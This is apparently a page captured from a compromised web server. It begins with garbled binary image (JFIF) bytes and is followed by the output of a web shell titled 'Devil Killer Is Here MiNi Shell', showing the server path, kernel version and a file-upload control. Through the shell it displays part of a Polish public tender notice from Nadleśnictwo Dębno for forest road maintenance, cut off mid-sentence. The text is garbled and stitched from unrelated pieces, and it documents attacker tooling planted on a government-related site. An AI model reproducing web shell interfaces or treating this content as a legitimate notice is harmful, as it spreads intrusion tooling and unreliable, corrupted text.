JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220721/0026943001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Utrzymanie dróg leśnych na terenie Nadleśnictwa Dębno w 2022 r.” – II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO DĘBNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539077</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Racławicka 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dębno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 756 1420</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">debno@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://debno.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Utrzymanie dróg leśnych na terenie Nadleśnictwa Dębno w 2022 r.” – II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3546329a-08bc-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00269430</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadl.debno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/nadl.debno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcami odbywa się przy użyciu Platformy SmartPZP. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w zakładce „Korespondencja”. W celu skorzystania z Platformy konieczna jest rejestracja Wykonawcy pod adresem: https://portal.smartpzp.pl/nadl.debno po kliknięciu na przycisk„Załóż konto”. Wykonawca rejestrując się akceptuje warunki korzystania z Platformy, określone w Regulaminie podczas rejestracji<br/>oraz uznaje go za wiążący. Korzystanie z Platformy jest bezpłatne.Podgląd i pobieranie dokumentacji postępowania nie wymaga logowania. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:złożenia,zmiany,wycofania oferty oraz do komunikacji wynosi 100 MB.<br/>Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików. Ofertę oraz oświadczenia, składane na podstawie art. 125 ust. 1 PZP<br/>sporządza się, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisemzaufanym lub podpisem osobistym. złożenie, zmiana i wycofanie oferty następujewyłącznie w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym, za pośrednictwem Platformy. do założenia konta na Platformie nie wymagany jest certyfikat kwalifikowany.Wykonawca składa ofertę wyłącznie za pośrednictwem<br/>Platformy, klikając w zakładce„Oferty” przycisk „Złóż ofertę”. Po kliknięciu wykonawca zostanie przeniesiony na stronę składania<br/>odpowiednio oferty, na której można załączyć formularz Oferty oraz inne pliki składające się na ofertę oraz pliki niestanowiące treści<br/>oferty, składane wraz z ofertą, aby wysłać ofertę należy kliknąć przycisk„Wyślij ofertę”. Zamawiający informuje, że Platforma jest kompatybilna ze wszystkimi podpisami elektronicznymi.przesyłane dokumenty powinny być załączone w formie plików w formacie odpowiednio . png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf,.zip,.rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg. wymagania<br/>sprzętowe - przeglądarka internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lubOpera ver. 58i<br/>późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11, system operacyjny Windows 7 i późniejsze,zainstalowane środowisko Java w wersji min. 1.8 (jre),w przypadku przeglądarek Opera,Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web,stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,oprogramowanie SzafirHostwsystemie operacyjnym,komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GBRAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0,Windows 7 iMacOS 10.12 - lub ich nowsze wersje,Pozostałe wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń orazinformacjiprzekazywanych przy ich użyciu opisane zostały w udostępnionym Regulaminie korzystania zPlatformy.wszelkie informacje stanowiące tajemnicę przedsiębiorstwa wrozumieniu ustawy z<br/>dnia16kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny<br/>zostać złożone w osobnym pliku wraz zjednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”. w zależności od formatu kwalifikowanego podpisu (PAdES, XAdES) i jego typu (zewnętrzny, wewnętrzny) wykonawca dołączado Platformy<br/>uprzedniopodpisane dokumenty wraz z wygenerowanym plikiem<br/>podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny)dokumenty w formacie „pdf” należy podpisywać tylko<br/>formatem PAdES, Zamawiający dopuszcza podpisanie dokumentów w formacie innym niż „pdf”, wtedy należy użyć formatu XAdES.<br/>Pozostałe informacje w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">osóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnegoprzepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UEL119 z 04 maja 2016 r., str. 1 – „RODO”)<br/>Z-cy informuje, iż administratorem<br/>danych osobowych jest Nadleśniczy Nadleśnictwa Dębno. Administrator wyznaczył Inspektora Ochrony Danych, panią Karolinę<br/>Kaczmarek, z którą w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty<br/>elektronicznejpod adresem<br/>rodo@szczecin.lasy.gov.pl lub telefonicznie wybierając numer +48 91 432 8712.Zamawiający przetwarza dane osobowe zebrane w<br/>niniejszym postępowaniu o udzielenie zamówienia publicznego wsposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem. Z-cy udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków<br/>ochrony prawnej, o których mowa w dziale IX PZP, do<br/>upływuterminu do ich wniesienia.Dane osoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie<br/>ziszczą się przesłanki określone w art. 255-256 i 310 PZP– w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania oudzielenie zamówienia i jego archiwizacji.Odbiorcami danych osobowych będą<br/>osoby lub podmioty,którym dokumentacja postępowania zostanie udostępniona woparciu o przepisy PZP, a także napodstawie<br/>ustawy o dostępie do informacji publicznej.Daneosobowe pozyskane w związku z prowadzeniem niniejszego postępowania o<br/>udzielenie zamówienia publicznego będą przechowywane,zgodnie z art. 78 ust. 1 PZP, przez okres 10<br/>lat od dnia zakończenia umowy w sprawie zamówienia publicznego.Dane osobowe pozyskane w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia mogą zostać przekazanepodmiotom świadczącymusługi doradcze, w tym usługi<br/>prawne i konsultingowe.Osoba,<br/>której dotyczą pozyskane w związku z prowadzeniemniniejszego postępowania dane osobowe, ma prawo:dostępudo swoich danych<br/>osobowych – zgodnie z art. 15 RODO, przy czym w przypadku<br/>korzystania przez osobę, której dane osobowe są przetwarzane przez Z-cego, z uprawnienia, o którym mowa wart. 15 ust. 1 -3<br/>RODO, Zamawiający może żądać od osoby występującej z żądaniem dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania<br/>o udzielenie zamówienia publicznego,do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czymskorzystanie<br/>przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 RODO, nie może<br/>skutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w<br/>sprawiezamówienia publicznego w zakresie niezgodnym z PZP oraz nie może naruszać<br/>integralności protokołu oraz jego załączników,do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust.2RODO,przy czym prawo do ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 RODO<br/>nie ogranicza przetwarza danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. W<br/>przypadku, gdywniesienie żądania dotyczącego prawa, o którym mowa<br/>wart. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Z-cy nie udostępnia tych danych,<br/>chyba że zachodzą przesłanki, o których<br/>mowa w art. 18ust. 2 RODO. Pozostałe informacje w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 638299,13 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych drogowych obejmujących utrzymanie dróg leśnych. Przedmiot zamówienia został szczegółowo określony i opisany w szczegółowej specyfikacji wykonania i odbioru robót – załącznik nr 1A oraz pomocniczo i poglądowo w przedmiarze robót – załącznik nr 1B do specyfikacji istotnych warunków zamówienia. <br/>W ramach robót utrzymaniowych na terenie Nadleśnictwa Dębno przewidziano wykonanie poniższych robót:<br/>a)	koryto pod wzmocnienie nawierzchni wraz z profilowaniem i zagęszczeniem przy wilgotności optymalnej o szer.3,50m pod warstwy konstrukcyjne z kruszywa łamanego {m2};<br/>b)	Jednostką obmiarową jest m3 (metr sześcienny) wykonanego i odebranego nasypu (formowanie i zagęszczanie) o szerokości 3,5m, i miąższości 0,3 m,<br/>c) podbudowa z kruszywa łamanego powstałego w wyniku przekruszenia skały litej C90/3 frakcji 0/63 mm gr. min 20 cm po zagęszczeniu i szer. min.3,5 m {m2};<br/>d)	klinowanie nawierzchni miałem kamiennym gr. po zagęszczeniu 1-2 cm i szer. 3,5 m {m2};<br/>e)	wykonanie poboczy - formowanie i zagęszczanie nasypów z gruntu pozyskanego z korytowania drogi o szerokości 75 cm pobocza{m2};<br/>f)	Wykonanie punktu odwodnieniowego - dołu chłonnego o wymiarach 2x2x1 m wraz z wyprofilowaniem skarp oraz utylizacją nadmiaru gruntu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233141-9 - Roboty w zakresie konserwacji dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">będą polegały na powtórzeniu robót budowlanych zgodnych z robotami budowlanymi stanowiącymi przedmiot niniejszego<br/>zamówienia.Zakres rzeczowy robót stanowiących przedmiot zamówień, o których mowa powyżej nie przekroczy wartości 100 %<br/>wartości niniejszego zamówienia. Zamówienia, o których mowa w art. 214 ust 1 pkt 7 Pzp będą udzielane po przeprowadzeniu odrębnego postępowania<br/>o udzielenie zamówienia w trybie zamówienia z wolnej ręki. Zamówienia te będą udzielane w przypadku wystąpienia potrzeby<br/>zwiększenia zakresu rzeczowego<br/>robót budowlanych stanowiących przedmiot niniejszego zamówienia, konieczności zmiany parametrów wykorzystanych materiałów,<br/>parametrów wykonanych elementów lub technologii wykonania – na warunkach analogicznych jak opisane we wzorze umowy,<br/>stanowiącym załącznik nr 4 do niniejszej SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się<br/>następującymi kryteriami oceny ofert: cena - 60%, okresu gwarancji jakości oraz rękojmi za wady - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości oraz rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczący zdolności technicznej lub zawodowej.a) Warunek ten, w zakresie doświadczenia, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia w którym upływa termin składania ofert (a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie) wykonał: • co najmniej trzy roboty budowlane, której<br/>przedmiotem była naprawa lub budowa drogi z kruszywa łamanego na kwotę nie mniejszą niż 100 000 złotych brutto każda,<br/>b) Warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje<br/>lub będzie dysponować: • co najmniej 1 szt. równiarki samojezdnej;• co najmniej 1 szt. zagęszczarki płytowej 500 kg lub 1<br/>szt. walca statycznego samojezdnego;• co najmniej 1 szt. koparki lub koparko- ładowarki.c) Warunek ten, w<br/>zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że dysponuje lub będzie dysponować: kierownikiem budowy (jedna osoba) posiadającym uprawnienia do<br/>kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub konstrukcyjno- budowlanej bez ograniczeń;<br/>posiadającym doświadczenie w kierowaniu co najmniej trzema robotami budowlanymi polegającymi na budowie lub<br/>przebudowie nawierzchni drogowych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potw. br. podst. do<br/>wykluczenia, Zam. przed udzieleniem zamó., działając na podstawie art. 274 ust. 1 PZP wezwie Wyk., którego oferta została<br/>najwyżej oceniona, do złożenia wwyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, akt. na dzień złożenia<br/>następujących podmiotowych środkówdowodowych: a)ośw. Wyk., w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z<br/>2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty luboferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej ,b)odpisu lub informacji z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP,<br/>sporządzonej nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>Wykonawca nie jest obowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał w oświadczeniu o którym mowa w art.<br/>125 ust. 1 PZP, dane umożliwiające dostęp do tych dokumentów. c)oświadczenia wykonawcy o aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 PZP (oświadczenie o braku podstaw do wykluczenia, w zakresie podstaw<br/>wykluczenia z postępowania określonych w: a) art. 108 ust. 1 pkt 1-2, b) art. 108 ust. 1 pkt 3 PZP, c) art. 108 ust. 1 pkt 4 PZP<br/>dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem śr.zapobiegawczego, d) art. 108 ust. 1 pkt 5 PZP<br/>dotyczących zawarcia z innymi wyko.porozumienia mającego na celu zakłócenie konkurencji, e) art. 108 ust. 1 pkt 6 PZP, f) art. 109<br/>ust. 1 pkt 1 PZP, odnośnie naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z<br/>dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r. poz. 1170 z późn. zm.), g) art. 109 ust. 7-8 i 10<br/>PZP , h) art. 7 ust. 1 pkt 1 Specustawy Zamawiający wykluczy Wykonawcę wymienionego w wykazach określonych w<br/>rozporządzeniu 765/2006 i w rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.<br/>U. z 2022 r. poz. 835, dalej: „Specustawa”).; i) art. 7 ust. 1 pkt 2 Specustawy Zamawiający wykluczy Wykonawcę, którego<br/>beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu<br/>terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba 